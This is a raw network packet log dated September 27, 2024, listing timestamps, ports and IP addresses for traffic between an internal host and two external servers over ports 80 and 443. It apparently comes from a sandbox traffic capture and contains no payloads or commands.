Sep 27, 2024 01:38:15.054141998 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054172993 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054177046 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054198027 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054207087 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054227114 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054239035 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054272890 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054286957 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054286957 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054305077 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054337978 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054354906 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054354906 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054374933 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054403067 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054409981 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054442883 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054455042 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054455042 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054476023 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054508924 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054517984 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054517984 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054542065 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054570913 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054574966 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054608107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054608107 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054641008 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054672956 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054692030 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054692030 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054692030 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054703951 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054737091 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054757118 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054758072 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054769039 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054800987 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054824114 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054824114 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054833889 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054867029 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054868937 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054898977 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054913998 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054932117 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054964066 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.054975033 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054975033 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.054997921 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055030107 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055063009 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055072069 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055072069 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055095911 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055129051 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055147886 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055147886 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055147886 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055160999 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055195093 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055227041 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055244923 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055244923 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055244923 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055262089 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055294037 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055300951 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055300951 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055327892 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055360079 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055413008 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055428028 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055428028 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055444956 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055478096 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055509090 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055517912 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055517912 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055541039 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055550098 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055560112 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055573940 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055608034 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.055660009 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055660009 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.055660009 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.091411114 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.091490030 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.092989922 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.093004942 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.093432903 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.094981909 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.095000029 CEST	49737	443	192.168.2.7	172.67.132.32
Sep 27, 2024 01:38:15.095066071 CEST	443	49737	172.67.132.32	192.168.2.7
Sep 27, 2024 01:38:15.138654947 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138725996 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138761044 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138812065 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.138812065 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.138812065 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.138825893 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138859987 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138876915 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.138909101 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138942957 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.138967037 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.138967037 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.138974905 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139008045 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139038086 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139038086 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139043093 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139084101 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139094114 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139100075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139127016 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139173985 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139173985 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139177084 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139210939 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139241934 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139264107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139264107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139273882 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139311075 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139347076 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139348030 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139362097 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139364004 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139419079 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139420033 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139451027 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139499903 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139502048 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139502048 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139549017 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139569044 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139580965 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139606953 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139612913 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139647007 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139693975 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139697075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139697075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139697075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139728069 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139759064 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139760017 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139792919 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139802933 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139827013 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139877081 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139877081 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139877081 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139878035 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139913082 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139930964 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139961004 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.139966011 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.139995098 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140027046 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140042067 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140042067 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140055895 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140086889 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140105009 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140115023 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140137911 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140167952 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140197039 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140197039 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140201092 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140234947 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140266895 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140294075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140294075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140294075 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140299082 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140316010 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140332937 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140355110 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140363932 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140396118 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140398979 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140424013 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140429020 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140460968 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140491009 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140491009 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140492916 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140526056 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140564919 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140564919 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140577078 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140597105 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140625954 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140654087 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140672922 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140686035 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140686989 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140703917 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140719891 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140769005 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140799999 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140805960 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140816927 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140847921 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140880108 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140901089 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140901089 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140912056 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140940905 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.140963078 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140994072 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.140995979 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141005993 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141042948 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141072035 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141074896 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141108036 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141132116 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141132116 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141139030 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141171932 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141200066 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141200066 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141216040 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141254902 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141256094 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141278028 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141288042 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141319990 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141338110 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141338110 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141351938 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141385078 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141416073 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141419888 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141419888 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141437054 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141452074 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141463995 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141483068 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141515970 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141520023 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141550064 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141582012 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141598940 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141598940 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141598940 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141617060 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141648054 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141680956 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141697884 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141697884 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141697884 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141731024 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141731977 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141763926 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141796112 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141815901 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141815901 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141829014 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141861916 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141892910 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141925097 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141931057 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141931057 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141956091 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.141978979 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141978979 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.141989946 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142025948 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142033100 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142054081 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142061949 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142095089 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142103910 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142127037 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142153025 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142159939 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142191887 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142200947 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142227888 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142229080 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142277956 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142285109 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142311096 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142343044 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142358065 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142358065 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142375946 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142393112 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142409086 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142429113 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142441988 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142461061 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142477989 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142508984 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142524958 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142524958 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142543077 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142546892 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142575979 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142607927 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142621994 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142621994 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142642021 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142656088 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142674923 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142694950 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142704010 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142735958 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142760992 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142760992 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142767906 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142800093 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142801046 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142818928 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142833948 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142865896 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142891884 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142891884 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142899036 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142931938 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142946005 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142946005 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142965078 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:15.142992973 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:15.142997980 CEST	80	49734	147.45.44.104	192.168.2.7
